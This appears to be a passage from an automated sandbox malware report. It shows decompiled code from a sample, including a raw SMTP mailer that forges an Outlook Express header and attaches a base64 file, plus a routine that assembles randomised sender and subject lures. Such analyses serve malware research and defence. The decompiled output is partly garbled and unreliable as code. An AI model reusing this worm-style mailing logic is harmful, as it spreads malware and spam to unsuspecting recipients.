                                                                          				char _v1316;
                                                                          				CHAR* _v1320;
                                                                          				CHAR* _v1324;
                                                                          				CHAR* _v1328;
                                                                          				void* __ebx;
                                                                          				int _t137;
                                                                          				int _t138;
                                                                          				char _t139;
                                                                          				char* _t140;
                                                                          				CHAR* _t166;
                                                                          				void* _t193;
                                                                          				CHAR* _t195;
                                                                          				CHAR* _t200;
                                                                          				CHAR* _t202;
                                                                          				void* _t203;
                                                                          				void* _t208;
                                                                          				void* _t209;
                                                                          				CHAR* _t215;
                                                                          				void* _t216;
                                                                          				void* _t217;
                                                                          				CHAR** _t222;
                                                                          				CHAR** _t226;
                                                                          
                                                                          				_t208 = __edx;
                                                                          				memset( &_v1068, 0, 0x400);
                                                                          				_t209 =  &_v1132;
                                                                          				asm("cld");
                                                                          				memset(_t209, 0, 0xc << 2);
                                                                          				 *((short*)(_t209 + 0xc)) = 0;
                                                                          				_v1164 = 0x412620;
                                                                          				_v1160 = 0x412624;
                                                                          				_v1156 = 0x412628;
                                                                          				_v1152 = 0x41262c;
                                                                          				_v1148 = 0x412630;
                                                                          				_v1144 = 0x412634;
                                                                          				_v1140 = 0x412638;
                                                                          				_v1136 = 0x41263c;
                                                                          				memcpy( &_v1228, 0x40d424, 0xd << 2);
                                                                          				GetSystemTime( &_v1244);
                                                                          				_v1276 = _v1244.wSecond & 0x0000ffff;
                                                                          				_v1280 = _v1244.wMinute & 0x0000ffff;
                                                                          				_v1284 = _v1244.wHour & 0x0000ffff;
                                                                          				_v1288 = _v1244.wYear & 0x0000ffff;
                                                                          				_v1292 =  *((intOrPtr*)(_t216 + (_v1244.wMonth & 0x0000ffff) * 4 - 0x4c8));
                                                                          				_v1296 = _v1244.wDay & 0x0000ffff;
                                                                          				_v1300 =  *((intOrPtr*)(_t216 + (_v1244.wDayOfWeek & 0x0000ffff) * 4 - 0x488));
                                                                          				_t137 = wsprintfA( &_v1132, "%s, %d %s %d %d:%d:%d GMT");
                                                                          				_v1292 = 6;
                                                                          				_v1296 = 1;
                                                                          				_v1300 = 2;
                                                                          				L00408708();
                                                                          				_t222 = _t217 - 0x50c + 0x18 - 0xfffffffffffffff8;
                                                                          				_t215 = _t137;
                                                                          				if(_t137 == 0xffffffff) {
                                                                          					L39:
                                                                          					_v1312 = _t215;
                                                                          					L004086C0();
                                                                          					_t138 = 0;
                                                                          				} else {
                                                                          					_v44 = 2;
                                                                          					_v1312 = 0x19;
                                                                          					L004086F8();
                                                                          					_v42 = _t137;
                                                                          					_t139 = _a4;
                                                                          					_v1316 = _t139;
                                                                          					L004086E8();
                                                                          					_t226 = _t222;
                                                                          					_v40 = _t139;
                                                                          					if(_t139 != 0xffffffff) {
                                                                          						L4:
                                                                          						_v1312 = 0x10;
                                                                          						_t140 =  &_v44;
                                                                          						_v1316 = _t140;
                                                                          						_v1320 = _t215;
                                                                          						L00408710();
                                                                          						_t222 = _t226 - 0xc;
                                                                          						if(_t140 == 0xffffffff) {
                                                                          							goto L39;
                                                                          						} else {
                                                                          							 *_t222 = _t215;
                                                                          							if(E004067E0(0) == 0) {
                                                                          								goto L39;
                                                                          							} else {
                                                                          								_v1324 = _a4;
                                                                          								_v1328 = "HELO %s\r\n";
                                                                          								_t200 =  &_v1068;
                                                                          								 *_t222 = _t200;
                                                                          								if(E00406788(wsprintfA(??, ??), _t215, _t200) == 0) {
                                                                          									goto L39;
                                                                          								} else {
                                                                          									_v1316 = _a8;
                                                                          									if(E00406788(wsprintfA(_t200, "MAIL FROM: <%s>\r\n"), _t215, _t200) == 0) {
                                                                          										goto L39;
                                                                          									} else {
                                                                          										_v1308 = _a12;
                                                                          										if(E00406788(wsprintfA(_t200, "RCPT TO: <%s>\r\n"), _t215, _t200) == 0 || E00406788(_t150, _t215, "DATA\r\n") == 0) {
                                                                          											goto L39;
                                                                          										} else {
                                                                          											_v1300 = _a8;
                                                                          											if(E00406746(wsprintfA(_t200, "FROM: <%s>\r\n"), _t200, _t215, _t200) == 0) {
                                                                          												goto L39;
                                                                          											} else {
                                                                          												_v1292 = _a12;
                                                                          												if(E00406746(wsprintfA(_t200, "TO: <%s>\r\n"), _t200, _t215, _t200) == 0) {
                                                                          													goto L39;
                                                                          												} else {
                                                                          													_v1284 =  &_v1132;
                                                                          													if(E00406746(wsprintfA(_t200, "Date: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t160, _t200, _t215, "MIME-Version: 1.0\r\n") == 0) {
                                                                          														goto L39;
                                                                          													} else {
                                                                          														_v1276 = _a16;
                                                                          														if(E00406746(wsprintfA(_t200, "Subject: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t164, _t200, _t215, "X-Mailer: Microsoft Outlook Express 6.00.2800.1106\r\n") == 0) {
                                                                          															goto L39;
                                                                          														} else {
                                                                          															_t166 = _a24;
                                                                          															_v1276 = _t166;
                                                                          															L0040C310();
                                                                          															_t222 = _t222 - 4;
                                                                          															if(_t166 == 0) {
                                                                          																if(E00406746(_t166, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0 || E00406746(_t167, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
                                                                          																	goto L39;
                                                                          																} else {
                                                                          																	_v1272 = _a20;
                                                                          																	_v1276 = "\r\n%s\r\n";
                                                                          																	_v1280 =  &_v1068;
                                                                          																	if(E00406746(wsprintfA(??, ??),  &_v1068, _t215,  &_v1068) == 0) {
                                                                          																		goto L39;
                                                                          																	} else {
                                                                          																		goto L36;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																if(E00406746(_t166, _t200, _t215, "Content-type: Multipart/Mixed; boundary=xContext\r\n") == 0 || E00406746(_t174, _t200, _t215, "\r\n--xContext\r\n") == 0) {
                                                                          																	goto L39;
                                                                          																} else {
                                                                          																	if(_a32 == 0) {
                                                                          																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0) {
                                                                          																			goto L39;
                                                                          																		} else {
                                                                          																			goto L23;
                                                                          																		}
                                                                          																	} else {
                                                                          																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=Windows-1251\r\n") == 0) {
                                                                          																			goto L39;
                                                                          																		} else {
                                                                          																			L23:
                                                                          																			if(E00406746(_t176, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
                                                                          																				goto L39;
                                                                          																			} else {
                                                                          																				_v1272 = _a20;
                                                                          																				_v1276 = "\r\n%s\r\n";
                                                                          																				_t202 =  &_v1068;
                                                                          																				_v1280 = _t202;
                                                                          																				if(E00406746(wsprintfA(??, ??), _t202, _t215, _t202) == 0 || E00406746(_t180, _t202, _t215, "\r\n--xContext\r\n") == 0) {
                                                                          																					goto L39;
                                                                          																				} else {
                                                                          																					_v1264 = _a28;
                                                                          																					if(E00406746(wsprintfA(_t202, "Content-type: Application/Octet-stream; name=\"%s\"; type:unknown\r\n"), _t202, _t215, _t202) == 0) {
                                                                          																						goto L39;
                                                                          																					} else {
                                                                          																						_v1256 = _a28;
                                                                          																						if(E00406746(wsprintfA(_t202, "Content-Disposition: attachment; filename=\"%s\"\r\n"), _t202, _t215, _t202) == 0 || E00406746(_t187, _t202, _t215, "Content-Transfer-Encoding: base64\r\n\r\n") == 0) {
                                                                          																							goto L39;
                                                                          																						} else {
                                                                          																							_v1248 = 0;
                                                                          																							_t203 = E004017F8(_t208, _a24,  &_v1248);
                                                                          																							if(E00406746(_t191, _t203, _t215, _t191) != 0) {
                                                                          																								_t193 = GlobalFree(_t203);
                                                                          																								_t222 = _t222 - 4;
                                                                          																								if(E00406746(_t193, _t203, _t215, "\r\n\r\n--xContext--\r\n") == 0) {
                                                                          																									goto L39;
                                                                          																								} else {
                                                                          																									L36:
                                                                          																									if(E00406788(_t171, _t215, "\r\n.\r\n") == 0 || E00406788(_t172, _t215, "QUIT\r\n") == 0) {
                                                                          																										goto L39;
                                                                          																									} else {
                                                                          																										_v1272 = _t215;
                                                                          																										L004086C0();
                                                                          																										_t138 = 1;
                                                                          																									}
                                                                          																								}
                                                                          																							} else {
                                                                          																								GlobalFree(_t203);
                                                                          																								_t222 = _t222 - 4;
                                                                          																								goto L39;
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t195 = _a4;
                                                                          						_v1320 = _t195;
                                                                          						L004086D8();
                                                                          						_t222 = _t226 - 4;
                                                                          						if(_t195 == 0) {
                                                                          							goto L39;
                                                                          						} else {
                                                                          							_v40 =  *((intOrPtr*)( *(_t195[0xc])));
                                                                          							goto L4;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t138;
                                                                          			}


























































                                                                          0x0040619a
                                                                          0x004061c4
                                                                          0x004061c9
                                                                          0x004061cf
                                                                          0x004061d7
                                                                          0x004061d9
                                                                          0x004061de
                                                                          0x004061e8
                                                                          0x004061f2
                                                                          0x004061fc
                                                                          0x00406206
                                                                          0x00406210
                                                                          0x0040621a
                                                                          0x00406224
                                                                          0x0040623e
                                                                          0x00406249
                                                                          0x00406258
                                                                          0x00406263
                                                                          0x0040626e
                                                                          0x00406279
                                                                          0x0040628b
                                                                          0x00406296
                                                                          0x004062a8
                                                                          0x004062bd
                                                                          0x004062c2
                                                                          0x004062ca
                                                                          0x004062d2
                                                                          0x004062d9
                                                                          0x004062de
                                                                          0x004062e1
                                                                          0x004062e6
                                                                          0x0040672e
                                                                          0x0040672e
                                                                          0x00406731
                                                                          0x00406739
                                                                          0x004062ec
                                                                          0x004062ec
                                                                          0x004062f2
                                                                          0x004062f9
                                                                          0x00406301
                                                                          0x00406305
                                                                          0x00406308
                                                                          0x0040630b
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406319
                                                                          0x0040633b
                                                                          0x0040633b
                                                                          0x00406343
                                                                          0x00406346
                                                                          0x0040634a
                                                                          0x0040634d
                                                                          0x00406352
                                                                          0x00406358
                                                                          0x00000000
                                                                          0x0040635e
                                                                          0x0040635e
                                                                          0x00406368
                                                                          0x00000000
                                                                          0x0040636e
                                                                          0x00406371
                                                                          0x00406375
                                                                          0x0040637d
                                                                          0x00406383
                                                                          0x00406399
                                                                          0x00000000
                                                                          0x0040639f
                                                                          0x004063a2
                                                                          0x004063c4
                                                                          0x00000000
                                                                          0x004063ca
                                                                          0x004063cd
                                                                          0x004063ef
                                                                          0x00000000
                                                                          0x0040640d
                                                                          0x00406410
                                                                          0x00406432
                                                                          0x00000000
                                                                          0x00406438
                                                                          0x0040643b
                                                                          0x0040645d
                                                                          0x00000000
                                                                          0x00406463
                                                                          0x00406469
                                                                          0x0040648b
                                                                          0x00000000
                                                                          0x004064a9
                                                                          0x004064ac
                                                                          0x004064ce
                                                                          0x00000000
                                                                          0x004064ec
                                                                          0x004064ec
                                                                          0x004064ef
                                                                          0x004064f2
                                                                          0x004064f7
                                                                          0x004064fc
                                                                          0x004066b1
                                                                          0x00000000
                                                                          0x004066c7
                                                                          0x004066ca
                                                                          0x004066ce
                                                                          0x004066dc
                                                                          0x004066f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004066f2
                                                                          0x00406502
                                                                          0x00406514
                                                                          0x00000000
                                                                          0x00406532
                                                                          0x00406536
                                                                          0x00406564
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406538
                                                                          0x0040654a
                                                                          0x00000000
                                                                          0x00406550
                                                                          0x0040656a
                                                                          0x0040657c
                                                                          0x00000000
                                                                          0x00406582
                                                                          0x00406585
                                                                          0x00406589
                                                                          0x00406591
                                                                          0x00406597
                                                                          0x004065ad
                                                                          0x00000000
                                                                          0x004065cb
                                                                          0x004065ce
                                                                          0x004065f0
                                                                          0x00000000
                                                                          0x004065f6
                                                                          0x004065f9
                                                                          0x0040661b
                                                                          0x00000000
                                                                          0x00406639
                                                                          0x00406639
                                                                          0x00406658
                                                                          0x00406668
                                                                          0x0040667d
                                                                          0x00406682
                                                                          0x00406697
                                                                          0x00000000
                                                                          0x0040669d
                                                                          0x004066f4
                                                                          0x00406706
                                                                          0x00000000
                                                                          0x0040671c
                                                                          0x0040671c
                                                                          0x0040671f
                                                                          0x00406727
                                                                          0x00406727
                                                                          0x00406706
                                                                          0x0040666a
                                                                          0x0040666d
                                                                          0x00406672
                                                                          0x00000000
                                                                          0x00406672
                                                                          0x00406668
                                                                          0x0040661b
                                                                          0x004065f0
                                                                          0x004065ad
                                                                          0x0040657c
                                                                          0x0040654a
                                                                          0x00406536
                                                                          0x00406514
                                                                          0x004064fc
                                                                          0x004064ce
                                                                          0x0040648b
                                                                          0x0040645d
                                                                          0x00406432
                                                                          0x004063ef
                                                                          0x004063c4
                                                                          0x00406399
                                                                          0x00406368
                                                                          0x0040631b
                                                                          0x0040631b
                                                                          0x0040631e
                                                                          0x00406321
                                                                          0x00406326
                                                                          0x0040632b
                                                                          0x00000000
                                                                          0x00406331
                                                                          0x00406338
                                                                          0x00000000
                                                                          0x00406338
                                                                          0x0040632b
                                                                          0x00406319
                                                                          0x00406745

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf$FreeGlobalclosesocketlstrlen$SystemTimeconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                          • String ID: --xContext--$%s$--xContext$.$ &A$ &A$&A(&A,&A0&A4&A8&A<&A$%s, %d %s %d %d:%d:%d GMT$---$Content-Disposition: attachment; filename="%s"$Content-Transfer-Encoding: 8bit$Content-Transfer-Encoding: base64$Content-type: Application/Octet-stream; name="%s"; type:unknown$Content-type: Multipart/Mixed; boundary=xContext$Content-type: text/plain; charset=ISO-8859-1$Content-type: text/plain; charset=Windows-1251$DATA$Date: %s$FROM: <%s>$Fri$HELO %s$MAIL FROM: <%s>$MIME-Version: 1.0$Mon$QUIT$RCPT TO: <%s>$Sat$Subject: %s$Sun$TO: <%s>$Thu$Tue$Wed$X-Mailer: Microsoft Outlook Express 6.00.2800.1106
                                                                          • API String ID: 1487464711-219272833
                                                                          • Opcode ID: 666c0d740a43bd74909cf6117d8f5958c059585b5faa14fa9939e6f1f40405de
                                                                          • Instruction ID: 6e52e2717ca3ea0a11f7245c2747809bb71ce8739c615a88298817d05e4ee505
                                                                          • Opcode Fuzzy Hash: 666c0d740a43bd74909cf6117d8f5958c059585b5faa14fa9939e6f1f40405de
                                                                          • Instruction Fuzzy Hash: 53E12BB44087118AD710AF25D68429EBBF4AF44748F02897EF8C9A7385D77CC9A4CB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E00402288(void* __eax, char _a4) {
                                                                          				void* _v16;
                                                                          				char _v76;
                                                                          				char _v188;
                                                                          				char _v300;
                                                                          				char _v508;
                                                                          				char _v780;
                                                                          				char _v812;
                                                                          				char _v1068;
                                                                          				int _v1072;
                                                                          				signed int _v1088;
                                                                          				void* _v1128;
                                                                          				char _v1132;
                                                                          				void* _v1136;
                                                                          				int _v1140;
                                                                          				intOrPtr _v1148;
                                                                          				int _v1152;
                                                                          				char* _v1156;
                                                                          				void* _v1160;
                                                                          				char* _v1164;
                                                                          				void* _v1168;
                                                                          				void* _v1172;
                                                                          				void* _v1180;
                                                                          				void* _v1188;
                                                                          				void* _v1196;
                                                                          				char* _v1204;
                                                                          				signed int _v1208;
                                                                          				char* _v1212;
                                                                          				void* _t350;
                                                                          				void* _t351;
                                                                          				signed int _t352;
                                                                          				void* _t353;
                                                                          				signed int _t354;
                                                                          				int _t358;
                                                                          				void* _t359;
                                                                          				char _t363;
                                                                          				void* _t365;
                                                                          				void* _t367;
                                                                          				intOrPtr* _t369;
                                                                          				void** _t370;
                                                                          				intOrPtr* _t374;
                                                                          
                                                                          				_v1072 = 0;
                                                                          				_t363 = _a4;
                                                                          				_v1132 = _t363;
                                                                          				L0040C310();
                                                                          				_t367 = _t365 - 0x458;
                                                                          				_t358 = 0;
                                                                          				if(__eax <= 0x64) {
                                                                          					_t350 =  &_v1068;
                                                                          					memset(_t350, 0, 0xfa);
                                                                          					_v1132 = _t363;
                                                                          					_v1136 = _t350;
                                                                          					L0040C320();
                                                                          					_t369 = _t367 - 8;
                                                                          					_v1140 = "mvcsv.qyy";
                                                                          					_t351 =  &_v812;
                                                                          					 *_t369 = _t351;
                                                                          					E00404C38();
                                                                          					_v1136 = _t351;
                                                                          					_v1140 = 0x104;
                                                                          					 *_t369 =  &_v780;
                                                                          					E00404620();
                                                                          					 *_t369 = 6;
                                                                          					_t352 = E00404EAE();
                                                                          					 *_t369 = 6;
                                                                          					_v1088 = E00404EAE();
                                                                          					while(_t352 == _v1088) {
                                                                          						 *_t369 = 0xa;
                                                                          						Sleep(??);
                                                                          						_t369 = _t369 - 4;
                                                                          						 *_t369 = 6;
                                                                          						_v1088 = E00404EAE();
                                                                          					}
                                                                          					_v1136 = 0xc8;
                                                                          					_v1140 = 0;
                                                                          					 *_t369 =  &_v508;
                                                                          					memset(??, ??, ??);
                                                                          					_v1136 = 0x64;
                                                                          					_v1140 = 0;
                                                                          					 *_t369 =  &_v300;
                                                                          					memset(??, ??, ??);
                                                                          					_v1136 = 0x64;
                                                                          					_v1140 = 0;
                                                                          					 *_t369 =  &_v188;
                                                                          					memset(??, ??, ??);
                                                                          					_t359 =  &_v76;
                                                                          					asm("cld");
                                                                          					memset(_t359, 0, 0xa << 2);
                                                                          					_t370 = _t369 + 0xc;
                                                                          					_v1140 =  *(0x40d0c4 + _t352 * 4);
                                                                          					_t353 = _t359;
                                                                          					 *_t370 = _t359;
                                                                          					L0040C328();
                                                                          					_v1148 = 0x40ed9b;
                                                                          					_v1152 = _t353;
                                                                          					L0040C328();
                                                                          					_v1156 =  *((intOrPtr*)(0x40d0c4 + _v1088 * 4));
                                                                          					_v1160 = _t353;
                                                                          					L0040C328();
                                                                          					_v1164 = 0x40ed9d;
                                                                          					_v1168 = _t353;
                                                                          					L0040C328();
                                                                          					_t374 = _t370 - 0xfffffffffffffff0;
                                                                          					 *_t374 = 0x12;
                                                                          					_t354 = E00404EAE();
                                                                          					_v1172 = 0x40eda2;
                                                                          					 *_t374 =  &_v1068;
                                                                          					if(strstr(??, ??) != 0) {
                                                                          						 *_t374 = 8;
                                                                          						_t354 = E00404EAE() + 0x12;
                                                                          					}
                                                                          					if(_t354 <= 0x19) {
                                                                          						switch( *((intOrPtr*)(_t354 * 4 +  &M0040EE08))) {
                                                                          							case 0:
                                                                          								_v1172 =  *((intOrPtr*)(0x40d0e0 + _t354 * 4));
                                                                          								 *_t374 =  &_v188;
                                                                          								L0040C328();
                                                                          								_t375 = _t374 - 8;
                                                                          								 *_t375 = 8;
                                                                          								_v1180 =  *((intOrPtr*)(0x40d080 + E00404EAE() * 4));
                                                                          								 *_t375 =  &_v508;
                                                                          								L0040C328();
                                                                          								_t376 = _t375 - 8;
                                                                          								 *_t376 = 2;
                                                                          								_v1188 = 0x40d148[E00404EAE()];
                                                                          								 *_t376 =  &_v300;
                                                                          								L0040C328();
                                                                          								_t374 = _t376 - 8;
                                                                          								goto L31;
                                                                          							case 1:
                                                                          								__eax =  *0x40d150;
                                                                          								_v1172 =  *0x40d150;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1180 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 2:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d154; // 0x40eb4e
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 3:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d158; // 0x40eb5f
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 4:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d15c; // 0x40eb73
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 5:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d160; // 0x40eb86
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 6:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d098; // 0x40e5e0
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 7:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d09c; // 0x40e618
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 8:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d08c; // 0x40e558
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 9:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d088; // 0x40e508
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xa:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0a0; // 0x40e64c
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1188 = "admin@bigtits.com";
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xb:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(2);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
